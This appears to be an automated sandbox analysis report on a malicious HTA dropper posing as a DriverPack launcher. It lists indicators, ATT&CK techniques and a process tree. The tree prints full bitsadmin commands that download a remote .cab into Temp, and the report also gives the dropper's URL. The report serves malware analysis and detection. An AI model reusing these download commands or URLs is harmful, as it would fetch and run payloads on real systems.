e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25

Analysis

max time kernel
32s
max time network
33s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
21/09/2024, 00:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PROD_Start_DriverPack.hta
Size

1KB
MD5

dda846a4704efc2a03e1f8392e6f1ffc
SHA1

387171a06eee5a76aaedc3664385bb89703cf6df
SHA256

e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25
SHA512

5cc5ad3fbdf083a87a65be76869bca844faa2d9be25657b45ad070531892f20d9337739590dd8995bca03ce23e9cb611129fe2f8457879b6263825d6df49da7a

Score

10^/10

defense_evasion discovery dropper evasion persistence privilege_escalation upx

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://dwrapper-prod.herokuapp.com/bin/watcher.html

Signatures

Blocklisted process makes network request 34 IoCs

flow	pid	Process
4	1476	mshta.exe
5	1476	mshta.exe
8	1476	mshta.exe
9	1476	mshta.exe
14	2500	mshta.exe
17	2500	mshta.exe
18	2500	mshta.exe
21	628	mshta.exe
22	2500	mshta.exe
23	628	mshta.exe
25	2500	mshta.exe
28	2500	mshta.exe
29	2500	mshta.exe
30	2500	mshta.exe
31	2500	mshta.exe
32	628	mshta.exe
33	2500	mshta.exe
35	2500	mshta.exe
36	2500	mshta.exe
37	2500	mshta.exe
38	2500	mshta.exe
39	2500	mshta.exe
49	2500	mshta.exe
50	2500	mshta.exe
51	2500	mshta.exe
52	2500	mshta.exe
61	2500	mshta.exe
62	2500	mshta.exe
63	2500	mshta.exe
64	2500	mshta.exe
65	2500	mshta.exe
66	2500	mshta.exe
71	2500	mshta.exe
72	2500	mshta.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
2392	bitsadmin.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1240	netsh.exe
2768	netsh.exe

Executes dropped EXE 17 IoCs

pid	Process
2120	7za.exe
2848	driverpack-wget.exe
3040	driverpack-wget.exe
2028	driverpack-wget.exe
2888	driverpack-wget.exe
1288	driverpack-wget.exe
680	driverpack-wget.exe
2512	driverpack-wget.exe
1068	driverpack-wget.exe
1640	driverpack-wget.exe
2832	driverpack-wget.exe
2408	driverpack-wget.exe
2380	driverpack-wget.exe
2892	driverpack-wget.exe
284	driverpack-wget.exe
964	driverpack-wget.exe
1652	driverpack-wget.exe

Loads dropped DLL 33 IoCs

pid	Process
2496	cmd.exe
2156	cmd.exe
2140	cmd.exe
444	cmd.exe
2140	cmd.exe
444	cmd.exe
1728	cmd.exe
1728	cmd.exe
2156	cmd.exe
992	cmd.exe
992	cmd.exe
2336	cmd.exe
2336	cmd.exe
752	cmd.exe
752	cmd.exe
1684	cmd.exe
1684	cmd.exe
980	cmd.exe
980	cmd.exe
984	cmd.exe
984	cmd.exe
844	cmd.exe
844	cmd.exe
1544	cmd.exe
1544	cmd.exe
2992	cmd.exe
2992	cmd.exe
1756	cmd.exe
1756	cmd.exe
1728	cmd.exe
1728	cmd.exe
2136	cmd.exe
2136	cmd.exe

UPX packed file 34 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2156-1552-0x0000000002380000-0x000000000246F000-memory.dmp	upx
behavioral1/memory/2848-1562-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2028-1564-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2888-1565-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/3040-1567-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2028-1589-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2848-1588-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/3040-1579-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2888-1596-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/680-1603-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2512-1605-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/1068-1612-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2832-1619-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2380-1617-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2408-1616-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/1640-1615-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2408-1632-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/1068-1667-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2512-1676-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2832-1662-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/1640-1654-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2380-1652-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/1288-1644-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/680-1642-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/1288-1600-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2892-1693-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/284-1696-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2992-1691-0x00000000022A0000-0x000000000238F000-memory.dmp	upx
behavioral1/memory/1652-1700-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/964-1699-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/964-1724-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/1652-1733-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/284-1717-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2892-1716-0x0000000000400000-0x00000000004EF000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
2140	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	expand.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	driverpack-wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	driverpack-wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	driverpack-wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	driverpack-wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	driverpack-wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	driverpack-wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	driverpack-wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	driverpack-wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	driverpack-wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	driverpack-wget.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 32 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
444	cmd.exe
3040	driverpack-wget.exe
2336	cmd.exe
2408	driverpack-wget.exe
1652	driverpack-wget.exe
2140	cmd.exe
992	cmd.exe
1544	cmd.exe
2832	driverpack-wget.exe
844	cmd.exe
284	driverpack-wget.exe
964	driverpack-wget.exe
2888	driverpack-wget.exe
980	cmd.exe
752	cmd.exe
2892	driverpack-wget.exe
1728	cmd.exe
2156	cmd.exe
2848	driverpack-wget.exe
680	driverpack-wget.exe
1756	cmd.exe
2992	cmd.exe
1728	cmd.exe
2380	driverpack-wget.exe
2512	driverpack-wget.exe
1684	cmd.exe
1288	driverpack-wget.exe
2136	cmd.exe
2028	driverpack-wget.exe
1640	driverpack-wget.exe
1068	driverpack-wget.exe
984	cmd.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1980	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeRestorePrivilege	2120	7za.exe
Token: 35	2120	7za.exe
Token: SeSecurityPrivilege	2120	7za.exe
Token: SeSecurityPrivilege	2120	7za.exe
Token: 33	2500	mshta.exe
Token: SeIncBasePriorityPrivilege	2500	mshta.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1476 wrote to memory of 2188	1476	mshta.exe	33
PID 1476 wrote to memory of 2188	1476	mshta.exe	33
PID 1476 wrote to memory of 2188	1476	mshta.exe	33
PID 1476 wrote to memory of 2188	1476	mshta.exe	33
PID 2188 wrote to memory of 2392	2188	cmd.exe	35
PID 2188 wrote to memory of 2392	2188	cmd.exe	35
PID 2188 wrote to memory of 2392	2188	cmd.exe	35
PID 2188 wrote to memory of 2392	2188	cmd.exe	35
PID 2188 wrote to memory of 2696	2188	cmd.exe	36
PID 2188 wrote to memory of 2696	2188	cmd.exe	36
PID 2188 wrote to memory of 2696	2188	cmd.exe	36
PID 2188 wrote to memory of 2696	2188	cmd.exe	36
PID 2188 wrote to memory of 1652	2188	cmd.exe	37
PID 2188 wrote to memory of 1652	2188	cmd.exe	37
PID 2188 wrote to memory of 1652	2188	cmd.exe	37
PID 2188 wrote to memory of 1652	2188	cmd.exe	37
PID 1476 wrote to memory of 2264	1476	mshta.exe	38
PID 1476 wrote to memory of 2264	1476	mshta.exe	38
PID 1476 wrote to memory of 2264	1476	mshta.exe	38
PID 1476 wrote to memory of 2264	1476	mshta.exe	38
PID 2264 wrote to memory of 1980	2264	cmd.exe	40
PID 2264 wrote to memory of 1980	2264	cmd.exe	40
PID 2264 wrote to memory of 1980	2264	cmd.exe	40
PID 2264 wrote to memory of 1980	2264	cmd.exe	40
PID 1476 wrote to memory of 1056	1476	mshta.exe	41
PID 1476 wrote to memory of 1056	1476	mshta.exe	41
PID 1476 wrote to memory of 1056	1476	mshta.exe	41
PID 1476 wrote to memory of 1056	1476	mshta.exe	41
PID 1056 wrote to memory of 1072	1056	cmd.exe	43
PID 1056 wrote to memory of 1072	1056	cmd.exe	43
PID 1056 wrote to memory of 1072	1056	cmd.exe	43
PID 1056 wrote to memory of 1072	1056	cmd.exe	43
PID 1056 wrote to memory of 596	1056	cmd.exe	44
PID 1056 wrote to memory of 596	1056	cmd.exe	44
PID 1056 wrote to memory of 596	1056	cmd.exe	44
PID 1056 wrote to memory of 596	1056	cmd.exe	44
PID 1056 wrote to memory of 940	1056	cmd.exe	45
PID 1056 wrote to memory of 940	1056	cmd.exe	45
PID 1056 wrote to memory of 940	1056	cmd.exe	45
PID 1056 wrote to memory of 940	1056	cmd.exe	45
PID 1476 wrote to memory of 736	1476	mshta.exe	46
PID 1476 wrote to memory of 736	1476	mshta.exe	46
PID 1476 wrote to memory of 736	1476	mshta.exe	46
PID 1476 wrote to memory of 736	1476	mshta.exe	46
PID 736 wrote to memory of 1284	736	cmd.exe	48
PID 736 wrote to memory of 1284	736	cmd.exe	48
PID 736 wrote to memory of 1284	736	cmd.exe	48
PID 736 wrote to memory of 1284	736	cmd.exe	48
PID 736 wrote to memory of 964	736	cmd.exe	49
PID 736 wrote to memory of 964	736	cmd.exe	49
PID 736 wrote to memory of 964	736	cmd.exe	49
PID 736 wrote to memory of 964	736	cmd.exe	49
PID 736 wrote to memory of 1780	736	cmd.exe	50
PID 736 wrote to memory of 1780	736	cmd.exe	50
PID 736 wrote to memory of 1780	736	cmd.exe	50
PID 736 wrote to memory of 1780	736	cmd.exe	50
PID 1476 wrote to memory of 2220	1476	mshta.exe	51
PID 1476 wrote to memory of 2220	1476	mshta.exe	51
PID 1476 wrote to memory of 2220	1476	mshta.exe	51
PID 1476 wrote to memory of 2220	1476	mshta.exe	51
PID 2220 wrote to memory of 3000	2220	cmd.exe	53
PID 2220 wrote to memory of 3000	2220	cmd.exe	53
PID 2220 wrote to memory of 3000	2220	cmd.exe	53
PID 2220 wrote to memory of 3000	2220	cmd.exe	53

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\PROD_Start_DriverPack.hta"
1⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1476
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /transfer dwnl-task-28509 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\dwnl_beetle-cab.cab" | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_start.txt" & echo %errorlevel% > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_exitcode.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2188
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /transfer dwnl-task-28509 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\dwnl_beetle-cab.cab"
    3⤵
    - Download via BitsAdmin
    PID:2392
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2696
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    PID:1652
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell Get-MpComputerStatus > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_defenderVersionPowershell.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2264
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-MpComputerStatus
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1980
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1056
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:1072
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    PID:596
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:940
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:736
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:1284
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:964
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1780
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2220
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:3000
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    PID:776
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    PID:1792
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  PID:2492
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:1684
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3020
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    PID:3016
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  PID:1176
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    PID:2344
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3004
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  PID:1496
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1236
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:308
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:748
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2480
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    PID:2404
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1540
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  PID:2724
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:2812
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\findstr.exe
    findstr /R /V "^$"
    3⤵
    PID:2676
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-28509 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_28509\log_bits_info.txt"
  2⤵
  PID:2544
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /info dwnl-task-28509
    3⤵
    PID:3044
- - C:\Windows\SysWOW64\findstr.exe
    findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3048
